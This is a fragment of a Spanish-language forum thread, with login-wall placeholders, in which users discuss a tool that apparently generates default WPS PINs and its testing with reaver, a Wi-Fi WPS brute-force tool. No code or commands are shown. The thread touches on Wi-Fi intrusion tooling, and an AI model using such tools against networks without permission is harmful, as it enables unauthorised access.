Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


kcdtv no me importaría colaborar con usted en este proyecto, me parece una buena iniciativa :).
Saludos.
gracias compi por el esfuerso lo he probado ,y da los pines correctos y a la hora de probar con el reaver va probando y de repente desaparece  :o a lo mejor le falta algunos retoques ,de momento me quedo con el actual de kcdtv un salu2 ;)
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.